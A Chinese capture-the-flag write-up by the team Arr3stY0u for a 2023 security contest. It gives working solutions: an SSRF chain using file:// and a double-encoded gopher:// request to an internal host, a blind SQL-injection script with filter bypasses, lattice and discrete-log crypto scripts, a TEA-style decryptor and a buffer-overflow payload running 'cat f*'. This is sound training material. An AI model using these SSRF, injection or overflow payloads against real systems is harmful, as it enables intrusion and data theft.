2023 数字网络安全人才挑战赛 writeup by Arr3stY0u

WriteUp 2年前 (2023) admin

814 0 0

HEADER

招新：WEB、CRYPTO、PWN、REVERSE、MISC、BLOCKCHAIN|(不招小白)

简历投递：[email protected](直接加qq也可以)

WEB

easy_curl:file 协议读 index.php 和 flag.php

ban 掉了 127.0 等关键字，利用/proc/net/arp 读内网地址

/?url=file:///proc/net/arp

然后构造post请求包

POST /flag.php HTTP/1.1Host: 10.252.47.1Content-Length: 36Content-Type: application/x-www-form-urlencodedConnection: closekey=2730ea2fd4c40df0f8b7fdb6738221d6

url 编码两次，hackbar 发包

http://80.endpoint-23fd7089a8224c3d9a662d874963c896.s.ins.cloud.dasctf.com:81/?url=gopher://127.1:80/_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%30%25%36%38%25%37%30%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%30%25%32%65%25%33%32%25%33%35%25%33%32%25%32%65%25%33%34%25%33%37%25%32%65%25%33%31%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%33%25%33%36%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%33%25%36%63%25%36%66%25%37%33%25%36%35%25%30%64%25%30%61%25%30%64%25%30%61%25%36%62%25%36%35%25%37%39%25%33%64%25%33%32%25%33%37%25%33%33%25%33%30%25%36%35%25%36%31%25%33%32%25%36%36%25%36%34%25%33%34%25%36%33%25%33%34%25%33%30%25%36%34%25%36%36%25%33%30%25%36%36%25%33%38%25%36%32%25%33%37%25%36%36%25%36%34%25%36%32%25%33%36%25%33%37%25%33%33%25%33%38%25%33%32%25%33%32%25%33%31%25%36%34%25%33%36

Simple Message Board：搜索处存在注入

2023 数字网络安全人才挑战赛 writeup by Arr3stY0u

禁用了 union 用 if 绕，禁用 substr 和 ascii，用 ord 和 left 绕

poc：

import requestsurl = "http://80.endpointb4f87d056f4f44af863eda11ec632595.s.ins.cloud.dasctf.com:81/index.php?act=search"flag = ""for i in range(1,60): right = 127 left = 32 while left < right: mid = (left + right) paylaod = { "keyword":f"aoliao%'and"1"=if(ord(right((select(group_concat(flag))from(flag)),{i}))>{mid},1,0)#" } tx = requests.post(url,data=paylaod).text if "ID:724" in tx: left = mid + 1 else: right = mid flag = chr(right) + flag print(flag)

CRYPTO

babysecret：

根据 HNP 问题构造格，s 比特有 400 有些格用不了，发现下面这个格可以解，先求出 x

from Crypto.Util.number import *from sage.all import *import timed = 30p = 6897108443075981744484758716081045417854227543713106404294789655180105457499042179717447342593790180943415014044830872925165163457476209819356694244840079inputs = [12844634549263053228759749264403637022740290008286987401585068952741935277415527678380021212624846722242500708422759563558995936977274580301379494195702461, 12251634003683452916928102291170339939586644029776192301741341674585154859358419625191986830852794085541953563738986709807899575511700135958334229151930861, 7051370666077542197248638013011793824477073777322219545882367881807130066168444134964571398112151848834032654978368255218649720738040945429837692857031957, 9773046862351952930368505593284546267554571295872377323111558071278701231472975791962979256551519533723988556870551885073742407630481198192389750289392107, 8883776497660138308720006912582738672888752344326928153810910221453595077711284302041512529457450211602787210761461172326429880594024187025419873043435877, 12056735137145460036580841038332100311160368843873164649606343042416896898793233249873902218683966283969721460087390120622254758027779960740926123005377571, 8819958747150954554494406068232243249186433676383469322817152210037563032056202909377825740775383087605647374150477096718956454225946093710691864988563109, 12246023449098354751049599873213988024512286270964608502444597112110163392131757813461977030270733012385926751192637938686124570227538910606279104888073013, 11308837998867241929817950595621831002334468993828126438599805989088017326675963100044309448653090403889186401929445861220402556074702741108929442867300279, 9184622887414209361516593101129556569811888214607556630094969763910426953786020755838094184972397480276666170685926425137063559394969166216392939257091541, 12896400069515890897430087815982545671830645201023665112429779640768899091287291452408369445919464144390726200808875066389240126909811239597092893733457339, 11227025698697471809912850435140886785315702278826761054472525227951791647003561270585720797267604996360933395122286757099101227901032364782594523739698877, 8162123490656317490361880020667919072708091053716891870691544217490126444997503404094174246087938828993696335191488583306443577208796794274099282013427247, 13366989889442670291461262313757977600095962057470863475519088648267301129719953368943419562144276679400967122727554764013132918505564677243979978807323041, 9920857455945408588203972193444437533164351309299040911469275059092031755811492460585653948481522995557801781838215407648572999358456612525812067538372579, 7139402473546047825312503780125417567716958846513076797328672521987900978293260385267945187604725349720103672258987935569856239987227455748213833342843243, 13108142660294572752252393081421368493392921884487755391460006730258159004638343897340537616297811742032405724656497443006056456690449881719305597286675631, 13276762958403786077380090195631980415297280849950287990717193547481553124160398455403123819234755237450529090601858784999113026218918277529515287668651121, 12463094640052886550696551772104539361264529587569204472038955376345085195998921095774583176899949596998985033050547755235409943131811058035802010421860899, 11307743131694864808301935844724645695851330736969875190167422024500753079857478680029193758960169072890576310607053767920339034290416580654771095674487943, 10053742503547378455068966704402695956702795408343604912294923217443553169726438945982031485796964462946592530592946335569560364464958066521486506177193131, 9703695763451799125258961776229325510814289358679213305418559381901496449849584244211834872313767844996255556721041007654625153809128987422992102292472533, 8148189465927721940294369879439913703690047528695196368949823197675716174991296513758196009346701553643721225250628151384047219921709201619262393792138023, 9114150910964237818418367840207724528917302406836157928223872622442928604249864486858755737149640683259834299165900696585038569188627682022002709058902291, 12273514376180781903469287345188404399033432117915094289694407562166649079228640510678711431664410226301556172582177240184695103942141430877677144285616059, 8355005721684425514882933910286584148305344580589623112959517428993968438533866906223777778058096962333203237111245328436600994120168924143849685728268811, 8957883838807471492147480816683526636019698464133185237668243268667169800811696770484487123560197988448434475112352005768286417529319182162245840523697001, 12168542584724814356632409768687396920143300559579648963851924568387314914334359305942685551210180448419674060219496395116081866784918059237133414041227833, 12285935007930825571672128346804313607196190465690759870758278705086034778808662886056460827935986285259185071514490942831585313190946386878622608868345563, 7719913817859572377164973343651155934060296607908537845256755472465025202751239980758950094865067751407889569369974011139801401586939119147773466111699913]answers = [3911325901261770731066343727353093385607196883601022244426857460074338420692610012414571623512152485474248169220030587839849722757773859682519433853455847, 4198555117325325874584019691418573071733167640213933749582347442518997588452211673143722179281773602455507001395983681009769848414007206268682184816168744, 4422173666634983234895098798813962037875417568235708524339826709271381748884936178371767574064794177416615710120223914725873239836121654705208614576413533, 3540260422555697887869627546208164711550015909378340105077652177481959576550678379723450981807556863572610759824660630418670546203733170058626755080797998, 6451498467498935201092514865627931677091078787997097414208430992183264950579022373372254486595458117887305393317663712337699331503725124287017134808484874, 3439629581963524351810430910737336124616316641656190641248434504621774235943514617301857917041111617104850245148746427180069743940612560718213177903427306, 4279468191481832212496939242093486044278976937965085475567008228061184947513156012369586970486543083130565628906296600553024574099481246534878242920637212, 4102135455518061133919027670571325279976222647984452353051395864554309521223498761823084717077102213648612826513661629599971609555235760152049549057234342, 329051927890365028889097463563711966673066795688728876214731188783168691555262156515161429328581094087585127929869064685419149676592073496155898360311360, 1674347209896897571502352451063188834938904430329951752111921115230349947823188121972980025563878887201507629419811736910690965020923751424101521816057970, 4779084317811375050159574994746297486592271247137823471375199626788956576998627181220489952507937768042501203098391966702297812537463211799837921684467541, 5240331815784322792144549873873658636726233093228415489098002982220769676718681132737794994708716389174162820721646744776624413735318240597745363490427584, 2689716894922604875455207695253665212853470308341743040957367957727155614199743562225147359614514189877983156892749669804800163252617480446565479990148021, 449708769594599088851244243076921016853502252396793496349534051273454215985560340288452398756880916680293627457774430655982228613348249480600180821975835, 1584603978331289335352997151059666773277943458357161051278658090420067023680231414255557805410288144092653121568766136372728095300982743309696347031121424, 4874260053151700374809337053763032489184725334196495160358275038586824027920238733886703163018450814805937363825223459277373073591021082276610135118976834, 3524374131362906900545297291947110177298862564718451821839794960169356082042548386553363480921097452902723033854749443288682983558847052843293666815425196, 6544123591499569232021913370293570477776709315008783531720886545784773471486769240711262562401683145937715612435213816372680189321141928790509490282629891, 4873861166228118967099569086478548167127431415017791678812419676791754466935832034870862000658789609084166891933970013849850146718379819943737269970654866, 4100817874436703071716655163972145036104985973164830547825929590871920825981241934633977227547934514142660786061291026657802357404024236287955309372489516, 343238276681348130286495167739162902430650061145485619903964358840996341335935043000395056684771452815629410388891486531126938900311458948803147120186532, 2683710724350412998770392318832434885304538325033159937379489319924346689197445720734209841902612235485016866254994045969716413020197296428323832404151182, 5909464641105704179999104311562416363090166762341644691188169716182958971270396007422581429813172933930581475771306034495224054972725230757675444731953480, 105593489999747649490909471306354863316673821363863362258853043970534652401274789197677558215188249074837829003335733211890211648501689656345824858507373, 4992379366542645691375959247465888889778118153982142100956809440855745659745235576280578316185469306620017845690312554043770651058126536040173113949524396, 6533456398244789907636779407045515567135195474284185379689518387558345997627435421582437390053234675991361808532278264077968540197407743744279106871716267, 5169360398767270275853790242315213671633880428212603766301308853363063092609582572957561138022806887895634140899640025570759919257615537375706008159680239, 203310740924699994885931266978520636166917734618272844754878785050509801614513144739164450834936178065792112797202959106365282699245578309060905297742706, 3143563289239398127009575193211845399079310618985464994769603542400451633289266080869317336163844517539211542909055869608349639432145332113320465388067087, 4016252180207572047405081190649590978593306403200098541033213590567723751195926093369984531729148621419589009515870336049849542537363832071754623330736088]def build_basis(oracle_inputs): """Returns a basis using the HNP game parameters and inputs to our oracle """ basis_vectors = [] for i in range(d): p_vector = [0] * (d+1) p_vector[i] = p basis_vectors.append(p_vector) basis_vectors.append(list(oracle_inputs) + [QQ(1)/QQ(p)]) return Matrix(QQ, basis_vectors)def approximate_closest_vector(basis, v): """Returns an approximate CVP solution using Babai's nearest plane algorithm """ BL = basis.LLL() G, _ = BL.gram_schmidt() _, n = BL.dimensions() small = vector(ZZ, v) for i in reversed(range(n)): c = QQ(small * G[i]) / QQ(G[i] * G[i]) c = c.round() small -= BL[i] * c return (v - small).coefficients()startime = time.time()lattice = build_basis(inputs)u = vector(ZZ, list(answers) + [0])v = approximate_closest_vector(lattice, u)recovered_alpha = (v[-1] * p) % pprint("Recovered alpha! Alpha is %d" % recovered_alpha)endtime = time.time()print(f"Time Spend {endtime - startime}")

再求出 flag根据 https://harry0597.com/2022/05/11/%E7%A6%BB%E6%95%A3%C2%B7DH%C2%B7Elgamal/

得到以下脚本：

import hashlibfrom Crypto.Util.number import *#n = 6897108443075981744484758716081045417854227543713106404294789655180105457499042179717447342593790180943415014044830872925165163457476209819356694244840079#factor(n-1)# 2 * 3 * 193 * 877 * 2663 * 662056037 * 812430763 * 814584769 * 830092927 * 849943517 * 969016409 * 1000954193 * 1022090869 * 1048277339 * 7938574420107972329924249635772221961795521132311900945710547973# c = pow(m, secret, n)# h = g^x mod pdef r(h, g, N, p, qi): Zp = Zmod(p) h = pow(h, N//qi, p) g = pow(g, N//qi, p) ri = discrete_log(Zp(h), Zp(g)) return int(ri)m = 6789891305297779556556571922812978922375073901749764215969003309869718878076269545304055843125301553103531252334876560433405451108895206969904268456786139n = 6897108443075981744484758716081045417854227543713106404294789655180105457499042179717447342593790180943415014044830872925165163457476209819356694244840079c = 1315637864146686255246675143589215932218700984880749264689270214639479160648747323586062096067740047809798944996253169402675772469028914904598116394230426tmp_list = [2, 3, 193, 877, 2663,662056037, 812430763 , 814584769 , 830092927, 849943517 ,969016409 , 1000954193 , 1022090869 , 1048277339 ]r_list = []for qi in tmp_list: tmp = r(c,m,n-1,n,qi) print(tmp) r_list.append(tmp)x = crt(r_list, tmp_list)module = 1for i in tmp_list: module *= iwhile True: if int(x).bit_length()>304: print('fail') break if int(pow(m, x, n))==c: print('x =', x) flag = long_to_bytes(x) print(flag) break x += module

REVVERSE

game：调试，因为 dword_AEE880 的值后面会去进行异或运算，这里把 dword_AEE880 改成 0x280

2023 数字网络安全人才挑战赛 writeup by Arr3stY0u

然后继续运行程序即可得到 flag

2023 数字网络安全人才挑战赛 writeup by Arr3stY0u

easykernel：ida，分析 dev_write 函数

2023 数字网络安全人才挑战赛 writeup by Arr3stY0u

整个加密结构和 TEA 系列很像，只要把+=换成-=，再调整下运算顺序即可解得 flag

#include <stdio.h>#include <stdint.h>void dump_data(uint32_t *v, int n, bool hex_or_chr){ if (hex_or_chr) { for (int i = 0; i < n; i++) { printf("0x%x,", v[i]); } } else { for (int i = 0; i < n; i++) { for (int j = 0; j < sizeof(uint32_t) / sizeof(uint8_t); j++) { printf("%c", (v[i] >> (j * 8)) & 0xFF); } } } printf("n"); return;}int main(){ unsigned int cipher[] = {0xc883b3aa, 0x07fb3950, 0x75bc5959, 0x7ab57e27, 0xc0249800, 0xada35753, 0xbf1d493f, 0x6e14af04, 0x468312c4}; unsigned int n = sizeof(cipher) / sizeof(uint32_t); unsigned int delta = 0x67616C66; unsigned int sum = 0xD89114C8; __int64 v25[] = {0xE000004DBLL, 0x2A600000017LL}; unsigned int v8; unsigned int v5; unsigned int v7; unsigned int v19; unsigned int v23; unsigned int v18; unsigned int v20; unsigned int v21; unsigned int v22; unsigned int s1_0 = cipher[0]; unsigned int s1_1 = cipher[1]; unsigned int s1_2 = cipher[2]; unsigned int s1_3 = cipher[3]; unsigned int s1_4 = cipher[4]; unsigned int s1_5 = cipher[5]; unsigned int s1_6 = cipher[6]; unsigned int s1_7 = cipher[7]; unsigned int s1_8 = cipher[8]; while (sum - delta != delta) { sum -= delta; v8 = *((unsigned int *)v25 + ((sum >> 2) & 3)); v5 = *((unsigned int *)v25 + (((unsigned __int8)(sum >> 2) ^ 2) & 3)); v7 = *((unsigned int *)v25 + (((unsigned __int8)(sum >> 2) ^ 1) & 3)); v19 = v8; v23 = v8; v18 = *((unsigned int *)v25 + (~(unsigned __int8)(sum >> 2) & 3)); v20 = *((unsigned int *)v25 + (((unsigned __int8)(sum >> 2) ^ 5) & 3)); v21 = *((unsigned int *)v25 + (((unsigned __int8)(sum >> 2) ^ 6) & 3)); v22 = *((unsigned int *)v25 + (((unsigned __int8)(sum >> 2) ^ 7) & 3)); s1_8 -= ((s1_7 ^ v23) + (s1_0 ^ sum)) ^ (((16 * s1_7) ^ (s1_0 >> 3)) + ((4 * s1_0) ^ (s1_7 >> 5))); s1_7 -= ((s1_6 ^ v22) + (sum ^ s1_8)) ^ (((16 * s1_6) ^ (s1_8 >> 3)) + ((4 * s1_8) ^ (s1_6 >> 5))); s1_6 -= ((s1_5 ^ v21) + (s1_7 ^ sum)) ^ (((4 * s1_7) ^ (s1_5 >> 5)) + ((16 * s1_5) ^ (s1_7 >> 3))); s1_5 -= ((s1_4 ^ v20) + (s1_6 ^ sum)) ^ (((4 * s1_6) ^ (s1_4 >> 5)) + ((16 * s1_4) ^ (s1_6 >> 3))); s1_4 -= ((s1_3 ^ v19) + (s1_5 ^ sum)) ^ (((4 * s1_5) ^ (s1_3 >> 5)) + ((16 * s1_3) ^ (s1_5 >> 3))); s1_3 -= ((s1_2 ^ v18) + (sum ^ s1_4)) ^ (((4 * s1_4) ^ (s1_2 >> 5)) + ((16 * s1_2) ^ (s1_4 >> 3))); s1_2 -= ((s1_1 ^ v5) + (sum ^ s1_3)) ^ (((4 * s1_3) ^ (s1_1 >> 5)) + ((16 * s1_1) ^ (s1_3 >> 3))); s1_1 -= ((s1_0 ^ v7) + (s1_2 ^ sum)) ^ (((4 * s1_2) ^ (s1_0 >> 5)) + ((16 * s1_0) ^ (s1_2 >> 3))); s1_0 -= ((s1_8 ^ v8) + (s1_1 ^ sum)) ^ (((4 * s1_1) ^ (s1_8 >> 5)) + ((s1_1 >> 3) ^ (16 * s1_8))); } sum -= delta; v8 = 0xE; v7 = 0x4DB; v5 = 0x2A6; v18 = 0x17; v19 = 0xE; v20 = 0x4DB; v21 = 0x2A6; v22 = 0x17; v23 = 0xE; s1_8 -= ((s1_7 ^ v23) + (s1_0 ^ sum)) ^ (((16 * s1_7) ^ (s1_0 >> 3)) + ((4 * s1_0) ^ (s1_7 >> 5))); s1_7 -= ((s1_6 ^ v22) + (sum ^ s1_8)) ^ (((16 * s1_6) ^ (s1_8 >> 3)) + ((4 * s1_8) ^ (s1_6 >> 5))); s1_6 -= ((s1_5 ^ v21) + (s1_7 ^ sum)) ^ (((4 * s1_7) ^ (s1_5 >> 5)) + ((16 * s1_5) ^ (s1_7 >> 3))); s1_5 -= ((s1_4 ^ v20) + (s1_6 ^ sum)) ^ (((4 * s1_6) ^ (s1_4 >> 5)) + ((16 * s1_4) ^ (s1_6 >> 3))); s1_4 -= ((s1_3 ^ v19) + (s1_5 ^ sum)) ^ (((4 * s1_5) ^ (s1_3 >> 5)) + ((16 * s1_3) ^ (s1_5 >> 3))); s1_3 -= ((s1_2 ^ v18) + (sum ^ s1_4)) ^ (((4 * s1_4) ^ (s1_2 >> 5)) + ((16 * s1_2) ^ (s1_4 >> 3))); s1_2 -= ((s1_1 ^ v5) + (sum ^ s1_3)) ^ (((4 * s1_3) ^ (s1_1 >> 5)) + ((16 * s1_1) ^ (s1_3 >> 3))); s1_1 -= ((s1_0 ^ v7) + (s1_2 ^ sum)) ^ (((4 * s1_2) ^ (s1_0 >> 5)) + ((16 * s1_0) ^ (s1_2 >> 3))); s1_0 -= ((s1_8 ^ v8) + (s1_1 ^ sum)) ^ (((4 * s1_1) ^ (s1_8 >> 5)) + ((s1_1 >> 3) ^ (16 * s1_8))); cipher[0] = s1_0; cipher[1] = s1_1; cipher[2] = s1_2; cipher[3] = s1_3; cipher[4] = s1_4; cipher[5] = s1_5; cipher[6] = s1_6; cipher[7] = s1_7; cipher[8] = s1_8; printf("解密后明文数据："); dump_data(cipher, n, 1); printf("解密后明文字符："); dump_data(cipher, n, 0); return 0;}// 541c290d-e89f-4539-8d24-2ccbd1ead8ae

PWN

pwn 起源read 前面是参数，跳转 100006F0，大端

from pwncli import *cli_script()io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc# one_gadgets: list = get_current_one_gadget_from_libc(more=False)CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)sl(b'cat f*;'.ljust(0x28,b'x00') + b'x10x00x06xF0')ia()

FOOTER

山海关安全团队是一支专注网络安全的实战型团队，队员均来自国内外各大高校与企事业单位，主要从事漏洞挖掘、情报分析、反涉网犯罪研究。
此外，团队于2022年1月3日成立Arr3stY0u战队，积极参与国内外各大网络安全竞赛。Arr3stY0u意喻”逮捕你“，依托高超的逆向分析与情报分析技术，为群众网络安全保驾护航尽一份力，简单粗暴，向涉网犯罪开炮。